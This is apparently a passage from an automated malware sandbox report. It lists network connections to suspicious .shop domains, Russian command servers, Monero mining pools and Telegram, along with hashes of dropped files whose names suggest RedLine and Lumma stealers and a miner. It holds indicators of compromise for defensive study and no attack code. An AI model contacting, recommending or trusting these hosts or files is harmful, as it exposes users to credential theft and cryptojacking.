| US | 104.21.40.92:443 | holicisticscrarws.shop | tcp |
| US | 8.8.8.8:53 | 191.30.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.44.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boredimperissvieos.shop | udp |
| US | 172.67.186.30:443 | boredimperissvieos.shop | tcp |
| US | 8.8.8.8:53 | 92.40.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.186.67.172.in-addr.arpa | udp |
| RU | 5.42.65.67:48396 | tcp | |
| DE | 49.13.229.86:80 | 49.13.229.86 | tcp |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.229.13.49.in-addr.arpa | udp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| US | 8.8.8.8:53 | 78.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | smallelementyjdui.shop | udp |
| US | 172.67.162.147:443 | smallelementyjdui.shop | tcp |
| US | 8.8.8.8:53 | sofaprivateawarderysj.shop | udp |
| US | 104.21.95.16:443 | sofaprivateawarderysj.shop | tcp |
| US | 8.8.8.8:53 | 147.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lineagelasserytailsd.shop | udp |
| US | 172.67.205.185:443 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| US | 104.21.50.137:443 | tcp | |
| US | 8.8.8.8:53 | 137.50.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | appetitesallooonsj.shop | udp |
| US | 104.21.48.123:443 | appetitesallooonsj.shop | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | minorittyeffeoos.shop | udp |
| US | 172.67.130.179:443 | minorittyeffeoos.shop | tcp |
| US | 8.8.8.8:53 | 123.48.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 8.8.8.8:53 | prideconstituiiosjk.shop | udp |
| US | 104.21.92.157:443 | prideconstituiiosjk.shop | tcp |
| RU | 5.42.96.64:80 | 5.42.96.64 | tcp |
| US | 8.8.8.8:53 | onlycitylink.com | udp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| US | 188.114.97.2:443 | realdeepai.org | tcp |
| US | 8.8.8.8:53 | 1xst.ru | udp |
| US | 104.21.18.166:443 | onlycitylink.com | tcp |
| US | 8.8.8.8:53 | firstfirecar.com | udp |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 172.67.193.220:443 | firstfirecar.com | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 172.67.193.220:443 | firstfirecar.com | tcp |
| US | 172.67.141.60:443 | lineagelasserytailsd.shop | tcp |
| US | 8.8.8.8:53 | 179.130.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.92.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.18.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.193.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.31.21.104.in-addr.arpa | udp |
| DE | 151.236.71.147:443 | free.360totalsecurity.com | tcp |
| KR | 211.171.233.126:80 | 1xst.ru | tcp |
| KR | 211.171.233.126:80 | 1xst.ru | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | 147.71.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.233.171.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| RU | 77.221.151.47:9090 | tcp | |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 3.162.143.213:80 | sd.p.360safe.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | 213.143.162.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.56.192.85.in-addr.arpa | udp |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 5.42.96.78:80 | 5.42.96.78 | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | zeph-eu2.nanopool.org | udp |
| PL | 51.68.137.186:10943 | zeph-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beshomandotestbesnd.run.place | udp |
| US | 45.88.186.125:7000 | beshomandotestbesnd.run.place | tcp |
| US | 8.8.8.8:53 | 125.186.88.45.in-addr.arpa | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 45.88.186.125:7000 | beshomandotestbesnd.run.place | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| RU | 77.221.151.47:9090 | tcp | |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
Files
memory/2812-1-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-0-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-2-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-4-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-8-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-7-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-6-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-5-0x0000000000240000-0x0000000000792000-memory.dmp
memory/2812-3-0x0000000000240000-0x0000000000792000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
| MD5 | 031c0d7f77970ec5d4bcfb75d8f06e00 |
| SHA1 | 836e672c8a8c7ac88ef21948fcbc69ac0dec53ba |
| SHA256 | fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9 |
| SHA512 | 0c8ddfcdfde3d28043cc4eca439f45694316f4d52ef43a2d08dd3a46b399b37ea3b91b0f439e6d90f98dd5b3e5c204a2f21bb0230d55fcf9603d554987fa4c3e |
memory/4844-23-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-29-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-30-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-28-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-27-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-26-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-25-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-24-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/4844-22-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2812-21-0x0000000000240000-0x0000000000792000-memory.dmp
memory/4844-34-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-37-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-40-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-43-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-41-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-39-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-38-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-42-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-35-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2940-36-0x0000000000F90000-0x00000000014E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
| MD5 | acbf3415c84289ab9808d2d7e5f8743d |
| SHA1 | ca13a555e3f8f57e563bdd7fde57530db305c250 |
| SHA256 | 7ae5191fde1f83494346e67aa99d2ca955ae31601593ad491b89baff9ce62098 |
| SHA512 | ddb4dbd87993bc4618a893c2d65deb8817c60c5d2c884f06eb55981c0d558ded5e1b719ea5c89229abec3b0c2c11d938440cc6b3e88b2dbabae0d42a7bae23c2 |
memory/2940-53-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/3732-61-0x0000000000C70000-0x000000000111B000-memory.dmp
memory/3732-74-0x0000000000C70000-0x000000000111B000-memory.dmp
memory/2696-75-0x00000000003E0000-0x000000000088B000-memory.dmp
C:\Users\Admin\1000006002\698639580a.exe
| MD5 | 65aeca0a2e005df5dc7f08a0d71cf7c3 |
| SHA1 | f932daafec4916d1bb9b8e3481c27f09bd29057d |
| SHA256 | 393c1152e4a519a761924675212b12c9ff6d4e4f0d4cd9defa08ed99c349f353 |
| SHA512 | 85393889a4efbd87123c0d14c0bd05335fcf9eb46fa590ca5900e1adf2882bc1cc68bf329561b75b167327f74785a01222b47ee74f6f4d805187275c4ece1d80 |
memory/1212-94-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-97-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-98-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-96-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-95-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-100-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-101-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-99-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/1212-102-0x00000000009A0000-0x0000000000FCB000-memory.dmp
memory/4844-103-0x0000000000F90000-0x00000000014E2000-memory.dmp
memory/2696-104-0x00000000003E0000-0x000000000088B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
| MD5 | 31841361be1f3dc6c2ce7756b490bf0f |
| SHA1 | ff2506641a401ac999f5870769f50b7326f7e4eb |
| SHA256 | 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee |
| SHA512 | 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019 |
memory/3940-120-0x0000000000400000-0x0000000000592000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
| MD5 | 20ae0bb07ba77cb3748aa63b6eb51afb |
| SHA1 | 87c468dc8f3d90a63833d36e4c900fa88d505c6d |
| SHA256 | daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d |
| SHA512 | db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2 |
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
| MD5 | 0c582da789c91878ab2f1b12d7461496 |
| SHA1 | 238bd2408f484dd13113889792d6e46d6b41c5ba |
| SHA256 | a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67 |
| SHA512 | a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a |
memory/2948-142-0x00000000006E0000-0x0000000000732000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
| MD5 | 7f981db325bfed412599b12604bd00ab |
| SHA1 | 9f8a8fd9df3af3a4111e429b639174229c0c10cd |
| SHA256 | 043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b |
| SHA512 | a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d |
memory/2948-153-0x0000000004FF0000-0x0000000005082000-memory.dmp
memory/2948-151-0x00000000054B0000-0x0000000005A54000-memory.dmp
memory/2480-154-0x0000000000220000-0x00000000002E0000-memory.dmp
memory/2948-161-0x00000000050B0000-0x00000000050BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpBB61.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/2948-178-0x0000000005C20000-0x0000000005C96000-memory.dmp
memory/1132-180-0x0000000001110000-0x0000000001111000-memory.dmp
memory/1132-183-0x0000000001110000-0x0000000001111000-memory.dmp
memory/2200-182-0x0000000000400000-0x0000000000458000-memory.dmp
memory/2948-181-0x0000000006440000-0x000000000645E000-memory.dmp
memory/2200-184-0x0000000000400000-0x0000000000458000-memory.dmp
memory/2948-187-0x0000000006CC0000-0x00000000072D8000-memory.dmp
memory/2948-188-0x0000000006810000-0x000000000691A000-memory.dmp
memory/2948-189-0x0000000006750000-0x0000000006762000-memory.dmp
memory/2948-190-0x00000000067B0000-0x00000000067EC000-memory.dmp
memory/2948-191-0x0000000006920000-0x000000000696C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
| MD5 | 9faf597de46ed64912a01491fe550d33 |
| SHA1 | 49203277926355afd49393782ae4e01802ad48af |
| SHA256 | 0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715 |
| SHA512 | ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e |
memory/5048-210-0x0000000000090000-0x00000000000E2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2804150937-2146708401-419095071-1000\76b53b3ec448f7ccdda2063b15d2bfc3_5a32ead2-14a8-4b34-b6a3-85cfb28e2fbd
| MD5 | 890f188d43461e95a9cbda7bb784c54c |
| SHA1 | 0f9521be46f00dad5176cee590f11ce2c8f836b0 |
| SHA256 | ea3b4b01c4d624c834a61bf77036e75aff12ad3644aefc71526b1d399998bbf5 |
| SHA512 | 2b51adb55afb91c940264af99f564ac3de4efc7148ae6fd397629f80e70217732ce107c3e7f8561346b92186a4a39d998edc5d3c38a4c5fb5a41335e29d0d06d |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 2128be6b7c279ef791f6dff3bf23ea34 |
| SHA1 | b452eac07cd95b9088ba9eb82e403dbe426af6b3 |
| SHA256 | fd83769ffaaff3d66b89e82a20a7574ba5073b84bcf88ab090ae5443b35f5f8e |
| SHA512 | 1f07e72bacd3836809d282da397ed2ca9aa634e0b4fc8b947de7aae1a511f9f80e8f7a1b0bacdcb5cd62fb430b3b9e534330877e238c95302884fd71497cc046 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 718048dcb9d505f5cc3b633b8e74902d |
| SHA1 | 696bad822551d7fb4ecdda1ba6cd29f6697a0032 |
| SHA256 | 43ae9fbf7418b1b79db6b9121faf48d9d213fc4eab3b09b660a99905cc42a65d |
| SHA512 | ca519b4c02e9861a9098b7e093db69de4e02374a889a3a1a513bdbac94fbdd7ee9c7bb36e420bbed6ca1d9249edb3f929e323d6eee409e36bef63ad29135cca8 |
memory/1212-233-0x00000000009A0000-0x0000000000FCB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
| MD5 | 0f52e5e68fe33694d488bfe7a1a71529 |
| SHA1 | 11d7005bd72cb3fd46f24917bf3fc5f3203f361f |
| SHA256 | efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8 |
| SHA512 | 238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400 |
C:\Program Files (x86)\GameSyncLink\installg.bat
| MD5 | 5dee3cbf941c5dbe36b54690b2a3c240 |
| SHA1 | 82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1 |
| SHA256 | 98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb |
| SHA512 | 9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556 |
C:\Program Files (x86)\GameSyncLink\GameService.exe
| MD5 | d9ec6f3a3b2ac7cd5eef07bd86e3efbc |
| SHA1 | e1908caab6f938404af85a7df0f80f877a4d9ee6 |
| SHA256 | 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c |
| SHA512 | 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4 |
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
| MD5 | 808c0214e53b576530ee5b4592793bb0 |
| SHA1 | 3fb03784f5dab1e99d5453664bd3169eff495c97 |
| SHA256 | 434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61 |
| SHA512 | 2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0 |
memory/2480-293-0x000000001BE00000-0x000000001BE3C000-memory.dmp
memory/2480-292-0x000000001B180000-0x000000001B192000-memory.dmp
memory/2480-291-0x000000001F6A0000-0x000000001F7AA000-memory.dmp
memory/2696-294-0x00000000003E0000-0x000000000088B000-memory.dmp
memory/2256-297-0x00000000013D0000-0x00000000013D1000-memory.dmp
memory/3760-296-0x0000000000400000-0x000000000063B000-memory.dmp
memory/3760-298-0x0000000000400000-0x000000000063B000-memory.dmp
memory/2948-299-0x0000000006A60000-0x0000000006AC6000-memory.dmp
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
| MD5 | e6943a08bb91fc3086394c7314be367d |
| SHA1 | 451d2e171f906fa6c43f8b901cd41b0283d1fa40 |
| SHA256 | aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873 |
| SHA512 | 505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a |
C:\Windows\Temp\959566.exe
| MD5 | 5c9e996ee95437c15b8d312932e72529 |
| SHA1 | eb174c76a8759f4b85765fa24d751846f4a2d2ef |
| SHA256 | 0eecdbfabaaef36f497e944a6ceb468d01824f3ae6457b4ae4b3ac8e95eebb55 |
| SHA512 | 935102aad64da7eeb3e4b172488b3a0395298d480f885ecedc5d8325f0a9eabeea8ba1ece512753ac170a03016c80ba4990786ab608b4de0b11e6343fbf2192b |
C:\Windows\Temp\cudart64_101.dll
| MD5 | 1d7955354884a9058e89bb8ea34415c9 |
| SHA1 | 62c046984afd51877ecadad1eca209fda74c8cb1 |
| SHA256 | 111f216aef35f45086888c3f0a30bb9ab48e2b333daeddafd3a76be037a22a6e |
| SHA512 | 7eb8739841c476cda3cf4c8220998bc8c435c04a89c4bbef27b8f3b904762dede224552b4204d35935562aa73f258c4e0ddb69d065f732cb06cc357796cdd1b2 |
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
| MD5 | 56e7d98642cfc9ec438b59022c2d58d7 |
| SHA1 | 26526f702e584d8c8b629b2db5d282c2125665d7 |
| SHA256 | a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383 |
| SHA512 | 0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f |
memory/2480-320-0x000000001F9B0000-0x000000001FA26000-memory.dmp
memory/2480-328-0x000000001B160000-0x000000001B17E000-memory.dmp
memory/5048-331-0x0000000006F90000-0x0000000006FE0000-memory.dmp
memory/3760-332-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/2408-367-0x0000000000B40000-0x0000000000B41000-memory.dmp
memory/2480-369-0x0000000020300000-0x00000000204C2000-memory.dmp
memory/2480-370-0x0000000020A00000-0x0000000020F28000-memory.dmp
C:\Program Files (x86)\GameSyncLink\installc.bat
| MD5 | 998ab24316795f67c26aca0f1b38c8ce |
| SHA1 | a2a6dc94e08c086fe27f8c08cb8178e7a64f200d |
| SHA256 | a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e |
| SHA512 | 7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75 |
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
| MD5 | 72b396a9053dff4d804e07ee1597d5e3 |
| SHA1 | 5ec4fefa66771613433c17c11545c6161e1552d5 |
| SHA256 | d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d |
| SHA512 | ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b |
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
| MD5 | d18dbc8c3596af59d661a2d0437bb173 |
| SHA1 | 0a88bb498001120fc5ae83764c5339f06ae70bac |
| SHA256 | ca58a17fe665c5997d673e7e5317d2a70dc2225ced1dbeea010888874ae48a81 |
| SHA512 | 25c2563ec9bf5fbd9f8c3a0606015ba93f4cfd8a8ea9dae72b34fc43c57cb024c3fb97b6bf82b6a59d79b092c014c4c47ca202126755a96880e7476cc91e5e76 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 57802067b24d05300cdd369ee6a48c48 |
| SHA1 | 3fd216573d9d1329598cfeeeeb8c38accfdfdd4e |
| SHA256 | adfd8cdab6e6ac5a5b5b234e05be88ec741a5b20627c97e442f34fb206b54d2b |
| SHA512 | c631ad8e69412499cc4d7ef9359f9c0c8525f7b1eca26d139b52c1e04924099049b1cdf406e6518389eb5fc7792977a11ef4c010205d05b811eb51a739a97ecc |
memory/4584-428-0x00007FF651DC0000-0x00007FF652109000-memory.dmp
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 8e56749da6a3af20eb210a35003f4622 |
| SHA1 | 4b58c1888e6e1c05b32e3eea8a691edafb9b3114 |
| SHA256 | 249a61c02618ccc34a6dfe56a8a90916f9ed2ecf87be1ec7ed6e325844fa7d57 |
| SHA512 | 4ecac9a46eec06b991e1cf652a70de575ec9ed9b012f784710a4655bac212d6ae30755ea877e6a38b25af4bcb4162719f03917d38f62c582b462db8f641bdf05 |
memory/2008-440-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4584-439-0x00007FF651DC0000-0x00007FF652109000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
| MD5 | 0099a99f5ffb3c3ae78af0084136fab3 |
| SHA1 | 0205a065728a9ec1133e8a372b1e3864df776e8c |
| SHA256 | 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226 |
| SHA512 | 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\Pictures\JSm3hmKzqvZsJmIY1dWd63CX.exe
| MD5 | 77f762f953163d7639dff697104e1470 |
| SHA1 | ade9fff9ffc2d587d50c636c28e4cd8dd99548d3 |
| SHA256 | d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea |
| SHA512 | d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499 |
C:\Program Files (x86)\GameSyncLink\installm.bat
| MD5 | 94b87b86dc338b8f0c4e5869496a8a35 |
